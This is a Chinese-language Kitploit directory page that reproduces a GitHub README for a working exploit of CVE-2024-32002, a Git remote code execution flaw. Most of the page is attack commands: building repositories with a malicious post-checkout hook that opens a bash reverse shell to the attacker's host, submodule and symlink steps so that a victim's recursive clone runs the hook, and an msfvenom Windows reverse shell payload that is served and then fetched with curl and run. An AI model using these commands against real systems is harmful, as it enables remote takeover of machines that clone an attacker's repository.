Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-32002 — GIT RCE CVE-2024-32002 | Kitploit
工具/GitHubGitHub/charlesgargasson/cve-2024-32002
Privilege EscalationExploitationLateral MovementWeb Application ExploitationPost-ExploitationPenetration TestingCommand and ControlRed TeamingPayload Development
GitHubcharlesgargasson/cve-2024-32002

CVE-2024-32002

GIT RCE CVE-2024-32002

2年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库

###################### GIT RCE CVE-2024-32002 ######################


描述


| CVE-2024-32002 | https://www.tarlogic.com/blog/cve-2024-32002-vulnerability-git/

|


利用


| 首先你需要在 git 上创建 "calledrepo" 和 "commandrepo" 仓库。 | 受害者稍后通过 "git clone --recursive calledrepo.git" 调用 calledrepo,该操作会重定向到 commandrepo 并执行钩子脚本。 | 这个 bash 反向 shell payload 在 WINDOWS 和 LINUX 上均有效。 | | 我使用 docker 中的 git cli,因为我不想搞乱系统的 git 配置,但这不是必须的。

.. code-block:: bash

启动一个 debian docker 实例

docker run --rm -it debian

安装 git

apt update apt install -y git

| 配置 git

.. code-block:: bash

git config --global user.email "whatever" git config --global user.name "whatever" git config --global protocol.file.allow always git config --global core.symlinks true git config --global init.defaultBranch main

| 设置变量

.. code-block:: bash

GIT_IP="10.129.19.99" GIT_USER="charles" GIT_PORT="3000" LHOST="10.10.14.113" LPORT="4444"

| 填充仓库

.. code-block:: bash

cd /tmp rm -rf calledrepo commandrepo

git clone "http://$GIT_IP:$GIT_PORT/$GIT_USER/commandrepo.git" cd commandrepo mkdir -p y/hooks cat <y/hooks/post-checkout #!/bin/bash /bin/bash -c "bash -i >& /dev/tcp/$LHOST/$LPORT 0>&1" EOF chmod +x y/hooks/post-checkout git add y/hooks/post-checkout git commit -m "post-checkout" git push cd ..

git clone "http://$GIT_IP:$GIT_PORT/$GIT_USER/calledrepo.git" cd calledrepo git submodule add --name x/y "http://$GIT_IP:$GIT_PORT/$GIT_USER/commandrepo.git" A/modules/x git commit -m "add-submodule" printf ".git" > dotgit.txt git hash-object -w --stdin < dotgit.txt > dot-git.hash printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" > index.info git update-index --index-info < index.info git commit -m "add-symlink" git push cd ..

在受害者机器上执行的命令

echo "git clone --recursive http://$GIT_IP:$GIT_PORT/$GIT_USER/calledrepo.git"

|


Windows


| 在 Windows 上利用后,你会得到一个存在某些问题/限制的 git bash: |

.. code-block:: bash

$ C:\windows\System32\whoami.exe /all bash: C:windowsSystem32whoami.exe: command not found

| 如果你想逃离这个环境,可以调用一个新的反向 shell: |

.. code-block:: bash

攻击者端

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o payload.exe sudo cp payload.exe /var/www/html sudo nc -nvlp 443 -s 10.10.14.113

.. code-block:: bash

Windows 端

cd ~/ curl http://10.10.14.113/payload.exe -O payload.exe ./payload.exe

|

| 别忘了 git bash 可能优先于 Windows 命令的路径。 | 你可以使用完整路径运行 Windows 命令。 |

.. code-block:: bash

C:\windows\System32\whoami.exe /all

|

下载工具